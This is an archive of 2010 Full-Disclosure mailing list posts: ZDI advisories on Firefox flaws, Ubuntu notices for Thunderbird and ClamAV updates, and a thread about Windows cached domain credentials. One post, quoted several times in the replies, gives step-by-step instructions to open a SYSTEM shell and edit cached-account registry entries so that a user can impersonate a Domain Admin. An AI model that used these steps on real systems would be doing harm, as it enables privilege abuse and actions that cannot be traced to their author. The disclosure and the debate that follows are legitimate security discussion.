ZDI-10-265: Mozilla Firefox NewIdArray Integer Overflow Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-265 December 9, 2010 -- CVE ID: CVE-2010-3767 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 3.6.x -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within Firefox's management of the JSSLOT_ARRAY_COUNT annotation. This value represents the number of items filled within a given Array object. If an attacker creates an array to a high enough value, an initialization routine can be made to mis-allocate a buffer. This can be abused by an attacker to corrupt memory and subsequently execute arbitrary code under the context of the user running the browser. -- Vendor Response: Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at: http://www.mozilla.org/security/announce/2010/mfsa2010-81.html -- Disclosure Timeline: 2010-09-24 - Vulnerability reported to vendor 2010-12-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * regenrecht -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-264: Mozilla Firefox nsDOMAttribute MutationObserver Remote Code Execution Vulnerability
ZDI-10-264: Mozilla Firefox nsDOMAttribute MutationObserver Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-264 December 9, 2010 -- CVE ID: CVE-2010-3766 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 3.6.x -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the application's support of the NodeIterator API used for element traversal. Due to a particular element not implementing functionality required by the API, a use-after free vulnerability can be forced to occur. This can be used to achieve code execution under the context of the application. -- Vendor Response: Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at: http://www.mozilla.org/security/announce/2010/mfsa2010-80.html -- Disclosure Timeline: 2010-08-25 - Vulnerability reported to vendor 2010-12-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * regenrecht -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-1020-1] Thunderbird vulnerabilities
=== Ubuntu Security Notice USN-1020-1 December 09, 2010 thunderbird, thunderbird-locales vulnerabilities CVE-2010-3768, CVE-2010-3776, CVE-2010-3777, CVE-2010-3778 === A security issue affects the following Ubuntu releases: Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 10.04 LTS: thunderbird 3.1.7+build3+nobinonly-0ubuntu0.10.04.1 Ubuntu 10.10: thunderbird 3.1.7+build3+nobinonly-0ubuntu0.10.10.1 After a standard system update you need to restart Thunderbird to make all the necessary changes. Details follow: Jesse Ruderman, Andreas Gal, Nils, Brian Hackett, and Igor Bukanov discovered several memory issues in the browser engine. An attacker could exploit these to crash THunderbird or possibly run arbitrary code as the user invoking the program. (CVE-2010-3776, CVE-2010-3777, CVE-2010-3778) Marc Schoenefeld and Christoph Diehl discovered several problems when handling downloadable fonts. The new OTS font sanitizing library was added to mitigate these issues. (CVE-2010-3768) Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locales_3.1.2ubuntu0.10.04.1.dsc Size/MD5: 2512 8bba2a29930fd4f47bb2113433cd3780 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locales_3.1.2ubuntu0.10.04.1.tar.gz Size/MD5: 10177112 61d1828843d93c18d6ccadec7b62b5e0 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.1.7+build3+nobinonly-0ubuntu0.10.04.1.diff.gz Size/MD5:96568 178d17258c92d2827b2058132084e404 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.1.7+build3+nobinonly-0ubuntu0.10.04.1.dsc Size/MD5: 2455 2bd12921e17b465b3ded0ed90b992e93 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.1.7+build3+nobinonly.orig.tar.gz Size/MD5: 66547472 b42dba1a96ac40207d521e40965642a2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/ Size/MD5: 216048 c0e8b31ce3970cb21f5327f9096e8d87 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-af_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 223704 f95310a6344a3f351efb2c3636ea8bc0 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-ar_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 243786 6e51d35f574bb8509ba36ada0bf6e7dc http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-be_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 208158 1b43018b36c30cb14391dd58e1b2d3aa http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-bg_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 248546 a9e6da035931c59a0706526cbc9a6617 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-bn-bd_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 258092 9bf30ec268556aa84ed8aeab25a463f9 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-ca_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 232714 1b8c883abfb8d2bd3212dadff9a79ffa http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-cs_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 231952 0ae5849a9555fc1a21731074ca4a1261 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-da_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 216500 8689c7073f96a7614154037a35042a1c http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-de_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 236248 ec7ff62603cee0451217ac169e442567 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-el_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 223694 e41018242c4a57e6b08329665ab61f8a http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-en-gb_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 217158 211482de902a07e4a60c91dcdb5bced9 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-es-ar_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 231928 083f32cd8b8c1b0ba7813672241ee861 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-es-es_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 186366 6ea51e1c75b6a45e21cdff0fe3d7e405 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-et_3.1.2ubuntu0.10.04.1_all.deb Size/MD5: 235200 17f39ff34817cfd4788c25d79e9391b5
[Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)
-- www.ExploitDevelopment.com 2010-M$-002 -- TITLE: Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts SUMMARY AND IMPACT: All versions of Microsoft Windows operating systems allow real-time modifications to the Active Directory cached accounts listing stored on all Active Directory domain workstations and servers. This allows domain users that have local administrator privileges on domain assets to modify their cached accounts to masquerade as other domain users that have logged in to those domain assets. This will allow local administrators to temporarily escalate their domain privileges on domain workstations or servers. If the local administrator masquerades as an Active Directory Domain Admin account, the modified cached account is now free to modify system files and user account profiles using the identity of the Domain Admin's account. This includes creating scripts to run as the Domain Admin account the next time that they log in. All files created will not be linked to your domain account in file and folder access lists. All security access lists will only show the Domain Admin's account once you log out of the modified cached account. This leads to a number of security issues that I will not attempt to identify in the article. One major issue is the lack of non-repudiation. Editing files and other actions will be completed as another user account. Event log entries for object access will only be created if administrators are auditing successful access to files (This will lead to enormous event log sizes). DETAILS: Prerequisites to exploit: #1: The user has a Domain User account that has administrative privileges on his/her workstation (This is a common configuration for both small and enterprise networks). #2: The Microsoft Windows Active Directory domain has not disabled the use of Group Policy Interactive logon: Number of previous logons to cache (in case domain controller is not available). The default value for this setting is 10 logons. #3: A domain/enterprise/schema/privileged administrator has logged in to the user's workstation at any time in the past (It would be very difficult to not have some type of admin from the domain login to a workstation for a number of reasons). Use the following steps to exploit this vulnerability: Step 1: Log in to your workstation using your Active Directory domain account. This account only needs to have administrative access to your workstation. Step 2: Create an interactive scheduled task to run a minute after creating it. This scheduled task brings up a command prompt as the NT Authority\SYSTEM account on Windows XP, and 2003. 'at 11:24 /interactive cmd.exe'. If using Windows Vista, 7, or 2008 Server, the attacker can use the psexec tool (psexec -i -s cmd.exe). Step 3: Once the SYSTEM command prompt comes up, open regedit from the command line. Step 4: Browse to 'HKEY_LOCAL_MACHINE\SECURITY\Cache' Step 5: The list of NL$1-10 records contain the cached active directory domain account sessions. To identify which account is yours, perform the following steps. Take note of all NL$ entries and entry content. Change your domain account password. Leave the SYSTEM shell and regedit application open. Log off the workstation, and then log back in to your domain account. Refresh the NL$ list. The NL$ line item that has been updated is your domain user's cached session. Step 6: For this example, we will assume that your NL$ record is NL$4 Step 7: Double click on NL$4. Take note of the four hex characters that are located in positions 1, 2, 3, and 4 on line 3 of the hex data. Step 8: For this example, the hex characters are 5a 04. This number is the Active Directory octet string representation of your domain account's objectSID (The user account unique section of your AD Security Identifier). Step 9: For this example, there is only one other cached account listed in the NL$ listing (NL$3). Double click on NL$3. Take note of the four hex characters that are located in positions 1, 2, 3, and 4 on line 3 of the hex data. Step 10: For this example, the hex characters are 59 04. This user account is Domain\DomainAdminAcct. Step 11: Double click on NL$4. Replace your SID hex representation 5a 04, with DomainAdminAcct's SID hex representation 59 04. Step 12: *Important* Disconnect all physical network connections from the workstation. Step 13: Log off of the domain account, then log back in to your domain account. Step 14: You will now be logged in to your modified cached account that is really the Domain Admin's account. Step 15: You are now free to modify system files and user account profiles using the identity of the Domain Admin's account. This includes creating scripts to run as the Domain Admin account the next time that
[Full-disclosure] [USN-1031-1] ClamAV vulnerabilities
=== Ubuntu Security Notice USN-1031-1 December 10, 2010 clamav vulnerabilities CVE-2010-4260, CVE-2010-4261, CVE-2010-4479 === A security issue affects the following Ubuntu releases: Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 10.04 LTS: libclamav6 0.96.3+dfsg-2ubuntu1.0.10.04.2 Ubuntu 10.10: libclamav6 0.96.3+dfsg-2ubuntu1.2 In general, a standard system update will make all the necessary changes. Details follow: Arkadiusz Miskiewicz and others discovered that the PDF processing code in libclamav improperly validated input. This could allow a remote attacker to craft a PDF document that could crash clamav or possibly execute arbitrary code. (CVE-2010-4260, CVE-2010-4479) It was discovered that an off-by-one error in the icon_cb function in pe_icons.c in libclamav could allow an attacker to corrupt memory, causing clamav to crash or possibly execute arbitrary code. (CVE-2010-4261) In the default installation, attackers would be isolated by the clamav AppArmor profile. Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2.diff.gz Size/MD5: 284066 72a7c4ff80f395c5dc8e4e7acd6fcd39 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2.dsc Size/MD5: 2323 d1d47147356bfaf610c993b8a9ed0530 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg.orig.tar.gz Size/MD5: 40572329 730c1af9badcee2bce4bbaf1cf8ea20a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.96.3+dfsg-2ubuntu1.0.10.04.2_all.deb Size/MD5: 297088 745b7132479daa4dbdc5ca6cc023e0b2 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.96.3+dfsg-2ubuntu1.0.10.04.2_all.deb Size/MD5: 1295426 b03dae836f5cdf461c3a5f6a98a7363f http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfiles_0.96.3+dfsg-2ubuntu1.0.10.04.2_all.deb Size/MD5: 5257088 aa5604ebd0f1e4646ce5d9e056513d11 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb Size/MD5: 424096 28c2f45042aafbf487e59ce679327bb3 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb Size/MD5: 22343058 abe9dff9f24f9f9b6b9f9faf5be2936b http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb Size/MD5: 313300 e88ecbee6c0f900b5854b2c1ca9b0771 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb Size/MD5: 335490 6d0081c84e0f46ee73bbf452309c03a3 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb Size/MD5: 217914 11b54c1f926069a93149ce28b7cf5325 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb Size/MD5: 3898290 0bd7e669232378b4b83a8bfdd0c8d716 http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb Size/MD5: 345108 843a766d2909777cc88ccbf03468a6fa i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb Size/MD5: 410854 416f5d73612e5d37fbb904bb80dffb49 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb Size/MD5: 22043342 aa53f5f25b3a28b22315e17544bd7a6d http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb Size/MD5: 308344 d090653db3483820420e465513b7d858 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb Size/MD5: 327348 4cdcc06e3cfb9c241c7d6f560963116b http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb Size/MD5: 218084 752cc79037d5f08df096c528bc7eb8b6 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb Size/MD5: 3751526 c6dc2280d050c37f1f82ce62ba612cac http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb Size/MD5: 338432 7156843fc6e5b7087d1fba58177ee81f armel architecture (ARM Architecture):
Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)
Why all the trouble? Just change the log files directly when logged in as the local admin. It's a whole lot simpler, and you don't even need the domain administrator to have interactively logged into your workstation. Or is your point that local administrators are, um, local administrators? t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of StenoPlasma @ www.ExploitDevelopment.com Sent: Thursday, December 09, 2010 5:07 PM To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk Cc: stenopla...@exploitdevelopment.com Subject: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) -- www.ExploitDevelopment.com 2010-M$-002 -- TITLE: Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts SUMMARY AND IMPACT: All versions of Microsoft Windows operating systems allow real-time modifications to the Active Directory cached accounts listing stored on all Active Directory domain workstations and servers. This allows domain users that have local administrator privileges on domain assets to modify their cached accounts to masquerade as other domain users that have logged in to those domain assets. This will allow local administrators to temporarily escalate their domain privileges on domain workstations or servers. If the local administrator masquerades as an Active Directory Domain Admin account, the modified cached account is now free to modify system files and user account profiles using the identity of the Domain Admin's account. This includes creating scripts to run as the Domain Admin account the next time that they log in. All files created will not be linked to your domain account in file and folder access lists. All security access lists will only show the Domain Admin's account once you log out of the modified cached account. This leads to a number of security issues that I will not attempt to identify in the article. One major issue is the lack of non-repudiation. Editing files and other actions will be completed as another user account. Event log entries for object access will only be created if administrators are auditing successful access to files (This will lead to enormous event log sizes). DETAILS: Prerequisites to exploit: #1: The user has a Domain User account that has administrative privileges on his/her workstation (This is a common configuration for both small and enterprise networks). #2: The Microsoft Windows Active Directory domain has not disabled the use of Group Policy Interactive logon: Number of previous logons to cache (in case domain controller is not available). The default value for this setting is 10 logons. #3: A domain/enterprise/schema/privileged administrator has logged in to the user's workstation at any time in the past (It would be very difficult to not have some type of admin from the domain login to a workstation for a number of reasons). Use the following steps to exploit this vulnerability: Step 1: Log in to your workstation using your Active Directory domain account. This account only needs to have administrative access to your workstation. Step 2: Create an interactive scheduled task to run a minute after creating it. This scheduled task brings up a command prompt as the NT Authority\SYSTEM account on Windows XP, and 2003. 'at 11:24 /interactive cmd.exe'. If using Windows Vista, 7, or 2008 Server, the attacker can use the psexec tool (psexec -i -s cmd.exe). Step 3: Once the SYSTEM command prompt comes up, open regedit from the command line. Step 4: Browse to 'HKEY_LOCAL_MACHINE\SECURITY\Cache' Step 5: The list of NL$1-10 records contain the cached active directory domain account sessions. To identify which account is yours, perform the following steps. Take note of all NL$ entries and entry content. Change your domain account password. Leave the SYSTEM shell and regedit application open. Log off the workstation, and then log back in to your domain account. Refresh the NL$ list. The NL$ line item that has been updated is your domain user's cached session. Step 6: For this example, we will assume that your NL$ record is NL$4 Step 7: Double click on NL$4. Take note of the four hex characters that are located in positions 1, 2, 3, and 4 on line 3 of the hex data. Step 8: For this example, the hex characters are 5a 04. This number is the Active Directory octet string representation of your domain account's objectSID (The user account unique section of your AD Security Identifier). Step 9: For this example, there is only one other cached account listed in the NL$ listing (NL$3). Double click on NL$3.
Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)
T, My article describes how to use the SECURITY registry hive to trick the Microsoft operating system in to performing an action that has a result that is not intended by the software developer. This action is performed on the Active Directory logon account cache that regular local administrators should not have access to. There are always other ways of doing things when it comes to this type of work. Thank you, - StenoPlasma at ExploitDevelopment.com www.ExploitDevelopment.com - Original Message From: Thor (Hammer of God) t...@hammerofgod.com Sent: Thursday, December 09, 2010 6:07 PM To: stenopla...@exploitdevelopment.com stenopla...@exploitdevelopment.com, full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) Why all the trouble? Just change the log files directly when logged in as the local admin. It's a whole lot simpler, and you don't even need the domain administrator to have interactively logged into your workstation. Or is your point that local administrators are, um, local administrators? t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of StenoPlasma @ www.ExploitDevelopment.com Sent: Thursday, December 09, 2010 5:07 PM To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk Cc: stenopla...@exploitdevelopment.com Subject: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) -- www.ExploitDevelopment.com 2010-M$-002 -- TITLE: Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts SUMMARY AND IMPACT: All versions of Microsoft Windows operating systems allow real-time modifications to the Active Directory cached accounts listing stored on all Active Directory domain workstations and servers. This allows domain users that have local administrator privileges on domain assets to modify their cached accounts to masquerade as other domain users that have logged in to those domain assets. This will allow local administrators to temporarily escalate their domain privileges on domain workstations or servers. If the local administrator masquerades as an Active Directory Domain Admin account, the modified cached account is now free to modify system files and user account profiles using the identity of the Domain Admin's account. This includes creating scripts to run as the Domain Admin account the next time that they log in. All files created will not be linked to your domain account in file and folder access lists. All security access lists will only show the Domain Admin's account once you log out of the modified cached account. This leads to a number of security issues that I will not attempt to identify in the article. One major issue is the lack of non-repudiation. Editing files and other actions will be completed as another user account. Event log entries for object access will only be created if administrators are auditing successful access to files (This will lead to enormous event log sizes). DETAILS: Prerequisites to exploit: #1: The user has a Domain User account that has administrative privileges on his/her workstation (This is a common configuration for both small and enterprise networks). #2: The Microsoft Windows Active Directory domain has not disabled the use of Group Policy Interactive logon: Number of previous logons to cache (in case domain controller is not available). The default value for this setting is 10 logons. #3: A domain/enterprise/schema/privileged administrator has logged in to the user's workstation at any time in the past (It would be very difficult to not have some type of admin from the domain login to a workstation for a number of reasons). Use the following steps to exploit this vulnerability: Step 1: Log in to your workstation using your Active Directory domain account. This account only needs to have administrative access to your workstation. Step 2: Create an interactive scheduled task to run a minute after creating it. This scheduled task brings up a command prompt as the NT Authority\SYSTEM account on Windows XP, and 2003. 'at 11:24 /interactive cmd.exe'. If using Windows Vista, 7, or 2008 Server, the attacker can use the psexec tool
Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)
What do you mean by regular local administrator? You're a local admin, or you're not. There are not degrees of local admin. Why are you under the impression that there are things on a local system that the local admin should not have access to? They can do anything they want to by design. Are you under the impression that the Domain Administrator has different permissions on a local machine than the local administrator does? The only reason a Domain Admin has admin rights by default on a domain workstation is because they simply belong to the local Administrators group. If I, as a local admin, remove the domain admin account from my local Administrators group, then they will not be local admins. In fact, I can just make the Domain Admin a guest on my workstation if I want to and there is nothing they can do about it. Sorry to be the bearer of bad news for you, but the local admin can do what they want to by design, and there is nothing that was not intended by the software developer here. This is, of course, why the people at MSFT dismissed it as noted. t -Original Message- From: StenoPlasma @ ExploitDevelopment [mailto:stenopla...@exploitdevelopment.com] Sent: Thursday, December 09, 2010 6:13 PM To: Thor (Hammer of God); full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) T, My article describes how to use the SECURITY registry hive to trick the Microsoft operating system in to performing an action that has a result that is not intended by the software developer. This action is performed on the Active Directory logon account cache that regular local administrators should not have access to. There are always other ways of doing things when it comes to this type of work. Thank you, - StenoPlasma at ExploitDevelopment.com www.ExploitDevelopment.com - Original Message From: Thor (Hammer of God) t...@hammerofgod.com Sent: Thursday, December 09, 2010 6:07 PM To: stenopla...@exploitdevelopment.com stenopla...@exploitdevelopment.com, full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) Why all the trouble? Just change the log files directly when logged in as the local admin. It's a whole lot simpler, and you don't even need the domain administrator to have interactively logged into your workstation. Or is your point that local administrators are, um, local administrators? t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of StenoPlasma @ www.ExploitDevelopment.com Sent: Thursday, December 09, 2010 5:07 PM To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk Cc: stenopla...@exploitdevelopment.com Subject: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) --- --- www.ExploitDevelopment.com 2010-M$-002 --- --- TITLE: Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts SUMMARY AND IMPACT: All versions of Microsoft Windows operating systems allow real-time modifications to the Active Directory cached accounts listing stored on all Active Directory domain workstations and servers. This allows domain users that have local administrator privileges on domain assets to modify their cached accounts to masquerade as other domain users that have logged in to those domain assets. This will allow local administrators to temporarily escalate their domain privileges on domain workstations or servers. If the local administrator masquerades as an Active Directory Domain Admin account, the modified cached account is now free to modify system files and user account profiles using the identity of the Domain Admin's account. This includes creating scripts to run as the Domain Admin account the next time that they log in. All files created will not be linked to your domain account in file and folder access lists. All security access lists will only show the Domain Admin's account once you log out of the modified cached account. This leads to a number of security issues that I will not attempt to identify in the article. One major issue is
Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)
No rouge user, only administrators. And no, if I remove domain accounts from my local system (again, as administrator) then I can avoid having GP change anything. Hell, I could put deny permission on the entire registry if I wanted to. There's no magic about domain admins - they're just another account that have default ACLs set. The local admin can always change it. If you need repudiation, don't let people be local admins. Plain and simple. This is why many audits (SOX, SAS70, etc) require that all administrators be accounted for (change logs, etc) for access... t -Original Message- From: Mike Hale [mailto:eyeronic.des...@gmail.com] Sent: Thursday, December 09, 2010 7:20 PM To: Thor (Hammer of God) Cc: stenopla...@exploitdevelopment.com; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) In fact, I can just make the Domain Admin a guest on my workstation if I want to and there is nothing they can do about it. With the caveat that they can readd themselves using GP anytime they want...but you know. I just wanted to throw that out there. I think the key vulnerability in this is the non-repudiation one the OP mentioned. Being able to run stuff under the domain admin's account is something a rogue user could potential abuse. I don't think this issue is particularly critical, but something a good admin should be aware of, IMO. On Thu, Dec 9, 2010 at 7:07 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: What do you mean by regular local administrator? You're a local admin, or you're not. There are not degrees of local admin. Why are you under the impression that there are things on a local system that the local admin should not have access to? They can do anything they want to by design. Are you under the impression that the Domain Administrator has different permissions on a local machine than the local administrator does? The only reason a Domain Admin has admin rights by default on a domain workstation is because they simply belong to the local Administrators group. If I, as a local admin, remove the domain admin account from my local Administrators group, then they will not be local admins. In fact, I can just make the Domain Admin a guest on my workstation if I want to and there is nothing they can do about it. Sorry to be the bearer of bad news for you, but the local admin can do what they want to by design, and there is nothing that was not intended by the software developer here. This is, of course, why the people at MSFT dismissed it as noted. t -Original Message- From: StenoPlasma @ ExploitDevelopment [mailto:stenopla...@exploitdevelopment.com] Sent: Thursday, December 09, 2010 6:13 PM To: Thor (Hammer of God); full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) T, My article describes how to use the 